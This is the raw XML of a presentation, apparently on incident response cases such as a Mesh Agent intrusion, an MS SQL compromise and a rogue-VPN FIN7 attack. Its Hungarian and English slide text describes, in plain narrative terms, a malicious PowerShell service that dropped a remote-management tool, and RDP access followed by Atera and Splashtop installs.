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4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId38"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId39"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2147471772" r:id="rId5"/>
    <p:sldId id="2147471773" r:id="rId6"/>
    <p:sldId id="2147471777" r:id="rId7"/>
    <p:sldId id="2147471775" r:id="rId8"/>
    <p:sldId id="2147471774" r:id="rId9"/>
    <p:sldId id="2147471770" r:id="rId10"/>
    <p:sldId id="2147471683" r:id="rId11"/>
    <p:sldId id="2147471729" r:id="rId12"/>
    <p:sldId id="2147471728" r:id="rId13"/>
    <p:sldId id="2147471771" r:id="rId14"/>
    <p:sldId id="2147471732" r:id="rId15"/>
    <p:sldId id="2147471751" r:id="rId16"/>
    <p:sldId id="2147471763" r:id="rId17"/>
    <p:sldId id="2147471762" r:id="rId18"/>
    <p:sldId id="2147471760" r:id="rId19"/>
    <p:sldId id="2147471754" r:id="rId20"/>
    <p:sldId id="2147471755" r:id="rId21"/>
    <p:sldId id="2147471756" r:id="rId22"/>
    <p:sldId id="2147471757" r:id="rId23"/>
    <p:sldId id="2147471759" r:id="rId24"/>
    <p:sldId id="2147471758" r:id="rId25"/>
    <p:sldId id="2147471761" r:id="rId26"/>
    <p:sldId id="2147471737" r:id="rId27"/>
    <p:sldId id="2147471753" r:id="rId28"/>
    <p:sldId id="2147471750" r:id="rId29"/>
    <p:sldId id="2147471733" r:id="rId30"/>
    <p:sldId id="2147471739" r:id="rId31"/>
    <p:sldId id="2147471740" r:id="rId32"/>
    <p:sldId id="2147471766" r:id="rId33"/>
    <p:sldId id="2147471767" r:id="rId34"/>
    <p:sldId id="2147471768" r:id="rId35"/>
    <p:sldId id="2147471776" r:id="rId36"/>
    <p:sldId id="2147471778" r:id="rId37"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="sk-SK"/>
    </a:defPPr>
    <a:lvl1pPr marL="0" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1959" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="497449" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1959" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="994899" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1959" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1492347" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1959" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1989796" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1959" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2487246" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1959" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2984695" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1959" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3482143" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1959" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3979592" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="195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A373A81-B8DA-43C1-A7CA-34A4345C250A}">
          <p14:sldIdLst>
            <p14:sldId id="2147471772"/>
            <p14:sldId id="2147471773"/>
            <p14:sldId id="2147471777"/>
            <p14:sldId id="2147471775"/>
            <p14:sldId id="2147471774"/>
            <p14:sldId id="2147471770"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Mesh Agent" id="{9C686532-42CE-4592-9EF9-8CFFC3FA425D}">
          <p14:sldIdLst>
            <p14:sldId id="2147471683"/>
            <p14:sldId id="2147471729"/>
            <p14:sldId id="2147471728"/>
            <p14:sldId id="2147471771"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="MS SQL Compromise" id="{9C2B2F02-84BF-4926-99E3-A0B7E47AFDC6}">
          <p14:sldIdLst>
            <p14:sldId id="2147471732"/>
            <p14:sldId id="2147471751"/>
            <p14:sldId id="2147471763"/>
            <p14:sldId id="2147471762"/>
            <p14:sldId id="2147471760"/>
            <p14:sldId id="2147471754"/>
            <p14:sldId id="2147471755"/>
            <p14:sldId id="2147471756"/>
            <p14:sldId id="2147471757"/>
            <p14:sldId id="2147471759"/>
            <p14:sldId id="2147471758"/>
            <p14:sldId id="2147471761"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Rogue VPN FIN7" id="{1D94697A-2AE9-4598-858A-363AE20AA702}">
          <p14:sldIdLst>
            <p14:sldId id="2147471737"/>
            <p14:sldId id="2147471753"/>
            <p14:sldId id="2147471750"/>
            <p14:sldId id="2147471733"/>
            <p14:sldId id="2147471739"/>
            <p14:sldId id="2147471740"/>
            <p14:sldId id="2147471766"/>
            <p14:sldId id="2147471767"/>
            <p14:sldId id="2147471768"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Closing" id="{D1B3E291-CC8B-4160-B7E7-C0EA3F3F0698}">
          <p14:sldIdLst>
            <p14:sldId id="2147471776"/>
            <p14:sldId id="2147471778"/>
          </p14:sldIdLst>
        </p14:section>
      </p14:sectionLst>
    </p:ext>
    <p:ext uri="{EFAFB233-063F-42B5-8137-9DF3F51BA10A}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="2" orient="horz" pos="3240" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="578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l Knopp" initials="MK" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="d4774e6b-626f-4391-9b53-de3b340216c1" providerId="Windows Live"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Eliška Smaržíková" initials="ES" lastIdx="3" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-2138097306-4033862265-156385499-44970" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="3" name="Eliška Zakarovská" initials="EZ" lastIdx="1" clrIdx="2">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Eliška Zakarovská" providerId="None"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="4" name="Cameron Tousley" initials="CT" lastIdx="5" clrIdx="3">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-2138097306-4033862265-156385499-1719" providerId="AD"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="5" name="Andrea Lee" initials="AL" lastIdx="7" clrIdx="4">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S-1-5-21-2138097306-4033862265-156385499-197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74CC"/>
    <a:srgbClr val="AAB5EF"/>
    <a:srgbClr val="5901EC"/>
    <a:srgbClr val="F4F4F4"/>
    <a:srgbClr val="E4E4E4"/>
    <a:srgbClr val="EA8601"/>
    <a:srgbClr val="0097A1"/>
    <a:srgbClr val="000D13"/>
    <a:srgbClr val="414D55"/>
    <a:srgbClr val="0026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0149" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="45" d="100"/>
          <a:sy n="45" d="100"/>
        </p:scale>
        <p:origin x="3331" y="43"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3240"/>
        <p:guide pos="578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>
              <a:latin typeface="Calibri Regular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590981-C2F7-4CC3-86DF-EC6C4A43288C}" type="datetimeFigureOut">
              <a:rPr lang="sk-SK" smtClean="0">
                <a:latin typeface="Calibri Regular"/>
              </a:rPr>
              <a:t>16. 7. 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="sk-SK">
              <a:latin typeface="Calibri Regular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>
              <a:latin typeface="Calibri Regular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9EED2D-78EE-41B1-8DF7-83452CC3889D}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0">
                <a:latin typeface="Calibri Regular"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="sk-SK">
              <a:latin typeface="Calibri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4269876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Calibri Regular"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p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Calibri Regular"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{476FCA56-521A-45FA-9F65-3CD057F3F901}" type="datetimeFigureOut">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>16. 7. 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="sk-S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Calibri Regular"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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Calibri Regular"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A1E8D2E8-4908-41DB-BC51-DB059FFBEE59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23687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4899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1306" b="0" i="0" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Calibri Regular"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="497449" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1306" b="0" i="0" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Calibri Regular"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="994899" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1306" b="0" i="0" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Calibri Regular"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1492347" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1306" b="0" i="0" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Calibri Regular"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1989796" algn="l" defTabSz="994899" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1306" b="0" i="0" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Calibri Regular"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2487246" algn="l" defTabSz="994899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6pPr>
    <a:lvl7pPr marL="2984695" algn="l" defTabSz="994899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7pPr>
    <a:lvl8pPr marL="3482143" algn="l" defTabSz="994899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8pPr>
    <a:lvl9pPr marL="3979592" algn="l" defTabSz="994899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B33DC-CEDB-FE05-A50D-CE9171BEA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25E165-3E54-9348-0DE2-4C9939F016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F8394F-9C47-A4F8-7911-1B81F1B839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E1EF0F-5608-7901-DE7D-CE442DEFB1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59541-1E3B-4D6C-AAA6-E8D13135EDE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06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8EE6EA-FF73-0BAA-0C19-41D97E1F9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BD249F-9162-ADE5-0681-809D18F723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9F6D07-E0BE-D1DB-DAB5-FC13C51F89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600454-24E9-C259-9F30-1FABC31C5C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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>12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881084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0299D8-181E-9177-74FB-A0FF19E28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33C157-384C-4FD6-761A-1675A9A637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394013-009C-B86F-D506-40C7965CD2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8B85F1-CDCD-8A05-BFDE-0021812C57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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>13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353018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25034A-B454-D856-D66C-ED2107159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DEA071-ADA7-773B-1ED5-9783C0670C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532087-35A7-C9A5-7774-06C26F9CB4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90B462-D6DD-2D4A-8C54-F9966CAFE0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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>14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913590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369A73-AD5F-0BF8-CBB9-A89310ABD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DDD740-0E72-1DD2-9653-D8E589FB7A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2598F8-36EA-E8F5-B327-82F77B92D4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7269EA-4B60-C251-01EF-12DD7ED32F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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>15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438247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CBECD4-3036-C891-A696-4441DCBB2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A7126B-B26F-0828-8083-D61177C389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D8073E-DFF1-5DEF-C505-0CC4A0F9DE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DDA8B6-2484-91D5-CAEC-3671C50E06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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>16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063814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415B0-99E8-A668-8774-7291EA23F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E5071D-A2E5-26FD-6037-4629D7127C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ED4113-59FE-5B05-C572-C5FB448093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B4077B-1EFA-1E05-4631-C57A6524B3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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>17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825739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76176-99B8-9182-AF70-CDB279E5C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29B7A9-743B-4AB6-129B-1A66BA65B6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8A6243-707D-55CC-5156-157AE4D71A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6BB757-F457-153C-5158-895400FF55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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>18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525362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E938BF-676A-E3AA-EC05-B654A7FF1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B60BBC-53F7-1F00-DBE7-1E3D3EBBB1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ED14CF-F5F7-BA3F-50CD-E494B1219C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790B3D-8D5A-1B1F-0C42-A1C0647692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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>19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858746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B6BB48-5F0B-0047-D1B4-19B05ECB4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D55B0F-957C-1B4F-154A-9333B02893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17560C-061F-0776-D1BC-C39BE5A12F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3FE983-0360-A978-4297-7C14D9565F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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>20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352200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345981-1B55-EB32-BE52-347BD8842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158CC2-8FBB-8639-EE6E-B636D90683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70A401-D166-37A1-5E32-4169FBCD04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AED382-C5DC-3E00-96C5-B59BE0E42E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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>21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67191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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>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786351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967EA-3A20-EA5E-02CB-9476C37A0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FE6D2C-5877-8E10-4D77-88AA191E48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45B026-7671-53CA-6601-31B1E8B921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EB8B9-2CF9-B77E-1C5A-FF07136DD5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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>22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831886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F6013-53E7-A165-0790-EE251C0F1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3C52D8-ED71-8C10-4145-5487CCD383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5A3E32-245A-FB1E-4C8F-9C67801824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hu-HU" dirty="0" smtClean="0"/>
              <a:t>2- 3 hónappal az ESET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" err="1" smtClean="0"/>
              <a:t>MDr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> bevezetése</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> előtt feltörték őket, nagy hálózat, több </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>kontinesen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" baseline="0" dirty="0" smtClean="0"/>
              <a:t> több telephely. Hetek, hónapok óta nem tapasztaltak semmi különöset…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D12C4D-4ADD-B7EE-4A2F-1B2CE3147B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1E8EBA-5B28-45EC-BBB3-A541BCA27473}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:t>23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785142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CFC107-F753-0930-DF16-1734058C2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E344ED-6199-4F7E-46BC-8BA6622CC0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6F5787-5ADC-87F8-8085-972305EBA7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hu-HU" sz="5800" dirty="0" smtClean="0"/>
              <a:t>Kártékony szolgáltatás futtatott egy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0" smtClean="0"/>
              <a:t> PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5800" dirty="0" err="1" smtClean="0"/>
              <a:t>szkriptet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5800" dirty="0" smtClean="0"/>
              <a:t>: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0" err="1" smtClean="0"/>
              <a:t>desdw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0" smtClean="0"/>
              <a:t>###.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304815" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- távoli szolgáltatás</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304815" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="4300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>desdw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>###.ps1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerTrash</a:t>
            </a:r>
            <a:endParaRPr lang="hu-HU" sz="4300" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="304815" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="hu-HU" sz="5800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="304815" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="5800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" sz="5800" dirty="0" smtClean="0"/>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0" err="1" smtClean="0"/>
              <a:t>desdw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0" smtClean="0"/>
              <a:t>###.ps1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5800" dirty="0" smtClean="0"/>
              <a:t>letöltött egy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0" smtClean="0"/>
              <a:t> .tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5800" dirty="0" smtClean="0"/>
              <a:t> fájlt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5800" dirty="0" err="1" smtClean="0"/>
              <a:t>LiteManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5800" dirty="0" smtClean="0"/>
              <a:t> (RMM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61D2D7-140D-6A2B-6143-23C1C993E5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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>24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234243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9F62C4-69BD-12ED-9D36-776F90E0D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33EFAA-A568-5D32-736D-09C5FC00FE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A63F9F-4735-914C-BED9-051812A6BF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76EE77-EE53-BB3B-3CBF-A47BACD742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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>25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476657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F7F38-9EB8-2F53-A738-E12C70057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685D85-5CBD-415A-2CBC-562C37BB72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FBBB04-639D-37C2-8783-D209E4D971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9AFAC1-F008-58BF-36E9-1C8174DAE9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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>26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742702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21152A-3D51-FBD0-6775-000805D95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3EBC4A-D289-B526-4296-51B015B0CC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CA62AA-5985-25F0-E8C2-00684DE086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04AEC9-F5FA-A331-B814-2B5A9FB41F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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>27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992407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0C0F5-3908-F223-6551-62466DE10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CF7E99-B3C1-5F19-ECB3-FDC913A13F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B0B802-EFD3-4C64-45A0-75D8B9464D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A78C3F-F4EB-9993-52F6-413AA8DC50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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>28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120142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63493E-DB8B-F2B8-D352-BA5447ED1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BB16B8-EF35-91FB-C449-F5C900DB6B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829695-FD4E-435F-3320-FA62B5DE3F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BCA3E5-8D64-B37E-623A-AF3BB4EE9B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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
              <a:rPr lang="sk-SK" smtClean="0"/>
              <a:pPr/>
              <a:t>29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774420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14AC14-145B-A841-74CB-7D4BAF92D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0D9B18-F1E9-6A94-4809-04CCC12D1E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653AF8-9F35-6AD8-8641-E1D4AD3458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972" dirty="0" smtClean="0"/>
              <a:t>1 month goes by – All is silent, nothing new seen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2972" dirty="0" smtClean="0"/>
              <a:t>Confident that we removed backdoors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2972" dirty="0" smtClean="0"/>
              <a:t>Unconfident in how initial access occurred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2972" dirty="0" smtClean="0"/>
              <a:t>RDP from VPN assigned IP, followed by RMM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2972" dirty="0" err="1" smtClean="0"/>
              <a:t>AteraAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2972" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2972" dirty="0" err="1" smtClean="0"/>
              <a:t>Splashtop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2972" dirty="0" smtClean="0"/>
              <a:t> being installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3170" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AteraAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3170" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Allows management of other software and command execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3170" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SplashTop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3170" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – Allows control of keyboard and mouse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2972" dirty="0" smtClean="0"/>
              <a:t>Device connected to IP does not have ESET installed, and is likely a device owned by the adversary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3170" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is likely the initial access.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4F0C71-9EAB-00E5-DB8C-D162733810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8D2E8-4908-41DB-BC51-DB059FFBEE59}" type="slidenum">
